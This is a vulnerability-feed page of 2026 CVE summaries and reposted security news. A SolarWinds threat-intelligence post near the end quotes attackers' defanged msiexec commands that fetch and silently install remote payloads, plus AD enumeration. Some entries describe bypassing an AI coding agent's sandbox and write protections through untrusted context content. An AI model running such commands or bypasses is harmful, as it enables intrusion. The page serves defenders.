### Impact When querying JSON or richText fields, user input was directly embedded into SQL without escaping, enabling blind SQL Injection attacks. An unauthenticated attacker could extract sensitive data (emails, password reset tokens) and achieve full account takeover without password cracking. **Users are affected if ALL of these are true:** 1. Payload version < v3.73.0 2. Using a Drizzle-ba

thehackerwire@mastodon.social at 2026-02-06T22:20:57.000Z ##

🔴 CVE-2026-25544 - Critical (9.8)

Payload is a free and open source headless content management system. Prior to 3.73.0, when querying JSON or richText fields, user input was directly embedded into SQL without escaping, enabling blind SQL injection attacks. An unauthenticated atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T22:16:42.000Z ##

🔴 CVE-2026-25544 - Critical (9.8)

Payload is a free and open source headless content management system. Prior to 3.73.0, when querying JSON or richText fields, user input was directly embedded into SQL without escaping, enabling blind SQL injection attacks. An unauthenticated atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1731(CVSS UNKNOWN)

EPSS: 0.44%

updated 2026-02-07T00:30:34

4 posts

BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

Nuclei template

1 repos

https://github.com/z3r0h3ro/CVE-2026-1731-exp

DarkWebInformer at 2026-02-10T17:08:16.682Z ##

‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)

darkwebinformer.com/critical-p

##

DarkWebInformer@infosec.exchange at 2026-02-10T17:08:16.000Z ##

‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)

darkwebinformer.com/critical-p

##

zeljkazorz@infosec.exchange at 2026-02-09T11:57:23.000Z ##

BeyondTrust fixes easy-to-exploit pre-auth RCE vulnerability in remote access tools (CVE-2026-1731)

helpnetsecurity.com/2026/02/09

#RemoteAccess #PrivilegedAccessManagement #Enterprise #Cybersecurity #CVE

##

beyondmachines1@infosec.exchange at 2026-02-08T11:01:23.000Z ##

BeyondTrust Patches Critical Pre-Authentication RCE Vulnerability in Remote Access Products

BeyondTrust reports a critical pre-authentication RCE vulnerability (CVE-2026-1731) in its Remote Support and Privileged Remote Access products, allowing unauthenticated attackers to execute OS commands.

**If you use self-hosted BeyondTrust Remote Support or PRA, this is important. Plan a quick update to the BT26-02 patches. Isolation probably won't work since these systems are designed for remote access. SaaS users are already protected, but self-hosted environments require manual action.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-69212(CVSS UNKNOWN)

EPSS: 0.09%

updated 2026-02-06T22:11:48

1 posts

## Summary A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server. ## Vulnerable Code **File:** `src/Util/XML.php:100` ```php public static function decodeP7M($file) { $directory = pathinfo($fil

thehackerwire@mastodon.social at 2026-02-09T22:53:23.000Z ##

🟠 CVE-2025-69212 - High (8.8)

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25593
(8.4 HIGH)

EPSS: 0.10%

updated 2026-02-06T21:57:22.450000

1 posts

OpenClaw is a personal AI assistant. Prior to 2026.1.20, an unauthenticated local client could use the Gateway WebSocket API to write config via config.apply and set unsafe cliPath values that were later used for command discovery, enabling command injection as the gateway user. This vulnerability is fixed in 2026.1.20.

thehackerwire@mastodon.social at 2026-02-06T21:21:39.000Z ##

🟠 CVE-2026-25593 - High (8.4)

OpenClaw is a personal AI assistant. Prior to 2026.1.20, an unauthenticated local client could use the Gateway WebSocket API to write config via config.apply and set unsafe cliPath values that were later used for command discovery, enabling comman...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25632
(10.0 CRITICAL)

EPSS: 0.11%

updated 2026-02-06T21:57:22.450000

2 posts

EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deserializer (my_load_from_json) that supports a type field. When type is present, the deserializer dynamically imports an attacker-specified module/class and i

thehackerwire@mastodon.social at 2026-02-06T21:20:02.000Z ##

🔴 CVE-2026-25632 - Critical (10)

EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deser...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:17:54.000Z ##

🔴 CVE-2026-25632 - Critical (10)

EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deser...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25628
(8.6 HIGH)

EPSS: 0.04%

updated 2026-02-06T21:44:00

2 posts

### Summary It is possible to append to arbitrary files via /logger endpoint. Minimal privileges are required (read-only access). Tested on Qdrant 1.15.5 ### Details `POST /logger` ([Source code link](https://github.com/qdrant/qdrant/blob/48203e414e4e7f639a6d394fb6e4df695f808e51/src/actix/api/service_api.rs#L195)) endpoint accepts an attacker-controlled `on_disk.log_file` path. There are no auth

thehackerwire@mastodon.social at 2026-02-06T21:19:53.000Z ##

🟠 CVE-2026-25628 - High (8.5)

Qdrant is a vector similarity search engine and vector database. From 1.9.3 to before 1.16.0, it is possible to append to arbitrary files via /logger endpoint using an attacker-controlled on_disk.log_file path. Minimal privileges are required (rea...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:17:49.000Z ##

🟠 CVE-2026-25628 - High (8.5)

Qdrant is a vector similarity search engine and vector database. From 1.9.3 to before 1.16.0, it is possible to append to arbitrary files via /logger endpoint using an attacker-controlled on_disk.log_file path. Minimal privileges are required (rea...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25592
(10.0 CRITICAL)

EPSS: 0.10%

updated 2026-02-06T21:43:54

1 posts

### Impact _What kind of vulnerability is it? Who is impacted?_ An Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`. Developers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`. ### Patches _Has the problem been patched? What version

thehackerwire@mastodon.social at 2026-02-06T21:21:29.000Z ##

🔴 CVE-2026-25592 - Critical (9.9)

Semantic Kernel is an SDK used to build, orchestrate, and deploy AI agents and multi-agent systems. Prior to 1.70.0, an Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the Ses...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25641
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-02-06T21:42:58

2 posts

### Summary A sandbox escape vulnerabilities due to a mismatch between the key on which the validation is performed and the key used for accessing properties. ### Details Even though the key used in property accesses (```b``` in the code below) is annotated as ```string```, this is never enforced: https://github.com/nyariv/SandboxJS/blob/6103d7147c4666fe48cfda58a4d5f37005b43754/src/executor.ts#L3

thehackerwire@mastodon.social at 2026-02-06T20:18:44.000Z ##

🔴 CVE-2026-25641 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, there is a sandbox escape vulnerability due to a mismatch between the key on which the validation is performed and the key used for accessing properties. Even though the key used in pr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T20:17:31.000Z ##

🔴 CVE-2026-25641 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, there is a sandbox escape vulnerability due to a mismatch between the key on which the validation is performed and the key used for accessing properties. Even though the key used in pr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25587
(10.0 CRITICAL)

EPSS: 0.05%

updated 2026-02-06T21:42:55

1 posts

### Summary As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped. ### Details This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged: ```js let a = Map.prototype; console.log(a) // undefined ```

thehackerwire@mastodon.social at 2026-02-06T20:18:07.000Z ##

🔴 CVE-2026-25587 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, as Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped. This vulnerability is fixed in 0.8.29.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25586
(10.0 CRITICAL)

EPSS: 0.05%

updated 2026-02-06T21:42:50

1 posts

## Summary A sandbox escape is possible by shadowing `hasOwnProperty` on a sandbox object, which disables prototype whitelist enforcement in the property-access path. This permits direct access to `__proto__` and other blocked prototype properties, enabling **host `Object.prototype` pollution** and persistent cross-sandbox impact. The issue was reproducible on Node `v23.9.0` using the project’s c

thehackerwire@mastodon.social at 2026-02-06T20:17:56.000Z ##

🔴 CVE-2026-25586 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, a sandbox escape is possible by shadowing hasOwnProperty on a sandbox object, which disables prototype whitelist enforcement in the property-access path. This permits direct access to ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25752(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-06T21:42:47

2 posts

### Summary **Description** An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. This affects FUXA through version 1.2.9. This issue has been patched in FUXA version 1.2.10. ### Impact This affects all deployments, including those with `runtime.settings.secureEnabled` set to `true`. Exploitation allows an unauthenticated,

thehackerwire@mastodon.social at 2026-02-10T15:02:59.000Z ##

🔴 CVE-2026-25752 - Critical (9.1)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:02:59.000Z ##

🔴 CVE-2026-25752 - Critical (9.1)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25751(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-06T21:42:43

2 posts

### Description An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. This affects FUXA through version 1.2.9. This issue has been patched in FUXA version 1.2.10. ### Impact This affects all deployments, including those with `runtime.settings.secureEnabled` set to `true`. Exploitation allows an unauth

thehackerwire@mastodon.social at 2026-02-10T15:02:49.000Z ##

🟠 CVE-2026-25751 - High (7.5)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:02:49.000Z ##

🟠 CVE-2026-25751 - High (7.5)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25580
(8.6 HIGH)

EPSS: 0.01%

updated 2026-02-06T21:42:28

1 posts

## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in Pydantic AI's URL download functionality. When applications accept message history from untrusted sources, attackers can include malicious URLs that cause the server to make HTTP requests to internal network resources, potentially accessing internal services or cloud credentials. **This vulnerability only affects application

thehackerwire@mastodon.social at 2026-02-06T21:21:19.000Z ##

🟠 CVE-2026-25580 - High (8.6)

Pydantic AI is a Python agent framework for building applications and workflows with Generative AI. From 0.0.26 to before 1.56.0, aServer-Side Request Forgery (SSRF) vulnerability exists in Pydantic AI's URL download functionality. When applicatio...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25520
(10.0 CRITICAL)

EPSS: 0.08%

updated 2026-02-06T21:42:24

2 posts

### Summary The return values of functions aren't wrapped. `Object.values`/`Object.entries` can be used to get an Array containing the host's `Function` constructor, by using `Array.prototype.at` you can obtain the hosts `Function` constructor, which can be used to execute arbitrary code outside of the sandbox. ### Details The return values of functions aren't wrapped, chaining function calls a

thehackerwire@mastodon.social at 2026-02-06T20:19:05.000Z ##

🔴 CVE-2026-25520 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, The return values of functions aren't wrapped. Object.values/Object.entries can be used to get an Array containing the host's Function constructor, by using Array.prototype.at you can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T20:17:50.000Z ##

🔴 CVE-2026-25520 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, The return values of functions aren't wrapped. Object.values/Object.entries can be used to get an Array containing the host's Function constructor, by using Array.prototype.at you can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23989
(8.2 HIGH)

EPSS: 0.03%

updated 2026-02-06T21:42:17

1 posts

### Impact A security issue was discovered in Reva based products that enables a malicious user to bypass the scope validation of a public link, allowing it to access resources outside the scope of a public link. ### Details Public link shares in OpenCloud are bound to a specific scope (usually a file or directory). Anonymous users accessing resources via this public link share are only allowed

thehackerwire@mastodon.social at 2026-02-06T19:16:34.000Z ##

🟠 CVE-2026-23989 - High (8.2)

REVA is an interoperability platform. Prior to 2.42.3 and 2.40.3, a bug in the GRPC authorization middleware of the "Reva" component of OpenCloud allows a malicious user to bypass the scope verification of a public link. By exploiting this via the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2067
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-06T21:30:58

2 posts

A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTimeGroupConfig. The manipulation of the argument year1 leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any

thehackerwire@mastodon.social at 2026-02-06T21:18:35.000Z ##

🟠 CVE-2026-2067 - High (8.8)

A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTimeGroupConfig. The manipulation of the argument year1 leads to buffer overflow. The attack may be ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:17:45.000Z ##

🟠 CVE-2026-2067 - High (8.8)

A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTimeGroupConfig. The manipulation of the argument year1 leads to buffer overflow. The attack may be ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25725(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-06T19:14:34

1 posts

Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .claude/settings.json configuration file when it did not exist at startup. While the parent directory was mounted as writable and .claude/settings.local.json was explicitly protected with read-only constraints, settings.json was not protected if it was missing. This allowed malicious code running inside the sandbox to cre

thehackerwire@mastodon.social at 2026-02-09T16:07:20.000Z ##

🔴 CVE-2026-25725 - Critical (10)

Claude Code is an agentic coding tool. Prior to version 2.1.2, Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .claude/settings.json configuration file when it did not exist at startup. While the parent directory was m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25722(CVSS UNKNOWN)

EPSS: 0.09%

updated 2026-02-06T19:02:42

1 posts

Claude Code failed to properly validate directory changes when combined with write operations to protected folders. By using the `cd` command to navigate into sensitive directories like `.claude`, it was possible to bypass write protection and create or modify files without user confirmation. Reliably exploiting this required the ability to add untrusted content into a Claude Code context window.

thehackerwire@mastodon.social at 2026-02-09T16:07:29.000Z ##

🔴 CVE-2026-25722 - Critical (9.1)

Claude Code is an agentic coding tool. Prior to version 2.0.57, Claude Code failed to properly validate directory changes when combined with write operations to protected folders. By using the cd command to navigate into sensitive directories like...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2103
(7.1 HIGH)

EPSS: 0.01%

updated 2026-02-06T18:30:43

2 posts

Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored credentials, including user passwords, database connection strings, and API keys. The encryption keys are identical across all installations. An attacker with access to the application binary and database can decrypt all stored credentials.

CVE-2026-24423
(9.8 CRITICAL)

EPSS: 9.22%

updated 2026-02-06T16:45:15.323000

4 posts

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

1 repos

https://github.com/aavamin/CVE-2026-24423

youranonnewsirc@nerdculture.de at 2026-02-09T19:45:26.000Z ##

Here's a summary of the latest technology and cybersecurity news from the last 24-48 hours:

Major tech firms globally plan to invest over $650 billion in AI infrastructure this year. OpenAI has launched "Frontier," a new enterprise platform for AI agents.

In cybersecurity, CISA mandated US federal agencies replace unsupported edge devices within 18 months due to state-sponsored exploitation. Russia's APT28 targeted European entities with a new Microsoft Office exploit. A critical SmarterMail flaw (CVE-2026-24423) is actively exploited in ransomware attacks. (Feb 6-7, 2026).

#News #Anonymous #AnonNews_irc

##

youranonnewsirc@nerdculture.de at 2026-02-09T13:45:52.000Z ##

Global news highlights include the kickoff of the 2026 Winter Olympics in Italy (Feb 7). In technology, OpenAI launched its Frontier enterprise AI agent platform. Apple acquired AI startup Q.AI for $2B, while Google reported significant AI-driven profit gains. Intel and AMD warned of server CPU shortages impacting China due to AI demand. The EU is also scrutinizing TikTok's "addictive design".

Cybersecurity saw CISA warn of a critical SmarterMail vulnerability (CVE-2026-24423) actively exploited in ransomware campaigns (Feb 7). Italian authorities thwarted Russian cyberattacks targeting government and Olympic-related websites. A rise in AI-driven phishing attacks was also reported.

#News #Anonymous #AnonNews_irc

##

gtronix@infosec.exchange at 2026-02-06T18:00:39.000Z ##

"CISA warns of SmarterMail RCE flaw used in ransomware attacks"

"[...] has issued a warning about CVE-2026-24423, an unauthenticated remote code execution (RCE) flaw in SmarterMail that is used in ransomware attacks. The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S."

bleepingcomputer.com/news/secu

#Cybersecurity

##

oversecurity@mastodon.social at 2026-02-06T17:40:06.000Z ##

CISA warns of SmarterMail RCE flaw used in ransomware attacks

The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S. has issued a warning about CVE-2026-24423, an unauthenticated remote code...

🔗️ [Bleepingcomputer] link.is.it/Kkych1

##

CVE-2026-21643
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-06T09:30:35

6 posts

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiClientEMS 7.4.4 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

1 repos

https://github.com/DarkSploits/CVE-2026-21643-Exploit

technadu at 2026-02-10T18:17:33.135Z ##

Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.

SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.

Source: thehackernews.com/2026/02/fort

💬 How are you reducing blast radius for management infrastructure?

🔔 Follow @technadu for threat-focused security coverage

##

jbhall56 at 2026-02-10T12:46:19.971Z ##

The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. thehackernews.com/2026/02/fort

##

beyondmachines1 at 2026-02-10T08:01:33.587Z ##

Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution

Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.

**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**

beyondmachines.net/event_detai

##

technadu@infosec.exchange at 2026-02-10T18:17:33.000Z ##

Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.

SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.

Source: thehackernews.com/2026/02/fort

💬 How are you reducing blast radius for management infrastructure?

🔔 Follow @technadu for threat-focused security coverage

#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu

##

jbhall56@infosec.exchange at 2026-02-10T12:46:19.000Z ##

The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. thehackernews.com/2026/02/fort

##

beyondmachines1@infosec.exchange at 2026-02-10T08:01:33.000Z ##

Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution

Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.

**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-11953
(9.8 CRITICAL)

EPSS: 6.95%

updated 2026-02-05T21:38:32

1 posts

The Metro Development Server, which is opened by the React Native CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables. On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments

4 repos

https://github.com/N3k0t-dev/PoC-CVE-collection

https://github.com/boroeurnprach/CVE-2025-11953-PoC

https://github.com/SaidBenaissa/cve-2025-11953-vulnerability-demo

https://github.com/Mr-In4inci3le/CVE-2025-11953-POC-

hackmag@infosec.exchange at 2026-02-07T15:51:05.000Z ##

⚪ Critical Metro4Shell Vulnerability Exploited to Breach Development Systems

🗨️ Attackers are actively exploiting the critical CVE-2025-11953 vulnerability in the React Native Metro server to infect developers’ systems with malware for Windows and Linux.

🔗 hackmag.com/news/metro4shell?u

#news

##

CVE-2026-25049(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-02-04T21:09:38

1 posts

### Impact Additional exploits in the expression evaluation of n8n have been identified and patched following [CVE-2025-68613](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp). An authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n. ###

1 repos

https://github.com/otakuliu/Expression-Sandbox-Escape-Simulation-Lab

hackmag@infosec.exchange at 2026-02-09T21:00:09.000Z ##

⚪ Critical bug in n8n opened the door to RCE

🗨️ A critical vulnerability has been discovered in the n8n workflow automation platform that allowed arbitrary command execution on the server side. The issue, identified as CVE-2026-25049 (scored 9.4 on the CVSS scale), affects the sandbox mechanism that is supposed to isolate the execution of JavaScr…

🔗 hackmag.com/news/n8n-patch?utm

#news

##

CVE-2025-40551
(9.8 CRITICAL)

EPSS: 54.99%

updated 2026-02-04T02:00:02.030000

1 posts

SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

Nuclei template

hasamba at 2026-02-10T14:26:34.786Z ##

----------------

🎯 Threat Intelligence
===================

Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.

Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.

Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.

Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.

Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.

🔹 solarwinds -2025-26399 -2025-40551

🔗 Source: huntress.com/blog/active-explo

##

CVE-2025-11598(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-02-03T12:30:35

1 posts

In mObywatel iOS application an unauthorized user can use the App Switcher to view the account owner's personal information in the minimized app window, even after the login session has ended (reopening the app would require the user to log in). The data exposed depends on the last application view displayed before the application was minimized This issue was fixed in version 4.71.0

agnieszkaserafinowicz@imagazine.pl at 2026-02-08T19:00:15.000Z ##

Masz mObywatela na iPhone? Sprawdź wersję. CERT ostrzega przed „podglądaczem” w multitaskingu

To drobiazg, ale kluczowy dla prywatności. CERT Polska potwierdził podatność w rządowej aplikacji mObywatel na iOS. Jeśli nie zaktualizowałeś jej w ostatnich dniach, Twój PESEL może świecić z ekranu nawet po wyjściu z aplikacji.

O co chodzi?

Błąd oznaczony jako CVE-2025-11598 dotyczy mechanizmu App Switcher (przełączania aplikacji). Gdy minimalizujesz aplikację na iPhone (przesuwając palcem od dołu), system robi jej „zrzut ekranu”, by wyświetlić go na karcie podglądu. Dobre aplikacje bankowe (i rządowe) powinny w tym momencie automatycznie zamazywać ekran (blur), by nikt, kto weźmie Twój telefon do ręki i wejdzie w listę otwartych apek, nie zobaczył stanu konta czy danych dowodu.

Wersje mObywatela poniżej 4.71.0 tego nie robiły. Efekt? Nieuprawniona osoba mogła podejrzeć Twoje dane bez logowania, po prostu przeglądając otwarte w tle aplikacje. Oczywiście wymagało to i tak fizycznego dostępu do Twojego iPhone’a i odblokowanego ekranu, ale niemniej problem z bezpieczeństwem istniał.

Co zrobić?

Sprawa jest prosta: wejdź do App Store i upewnij się, że masz wersję 4.71.0 lub nowszą. Poprawka już tam jest. Ten błąd w starszej wersji mObywatela wykrył i przesłał ekipie CERT.pl Maciej Krakowiak z DSecure.me.

mObywatel wchodzi w 2026 rok z polskim AI

#aktualizacjaMObywatel #bezpieczeństwoIPhone #błądMObywatel #CERTPolska #CVE202511598 #mObywatelIOS ##

CVE-2026-0227
(7.5 HIGH)

EPSS: 0.06%

updated 2026-01-31T00:31:36

2 posts

A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode.

2 repos

https://github.com/TeeyaR/CVE-2026-0227-Palo-Alto

https://github.com/CkAbhijit/CVE-2026-0227-Advanced-Scanner

AAKL at 2026-02-10T20:56:25.538Z ##

Palo Alto advisory, posted yesterday:

Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal security.paloaltonetworks.com/

##

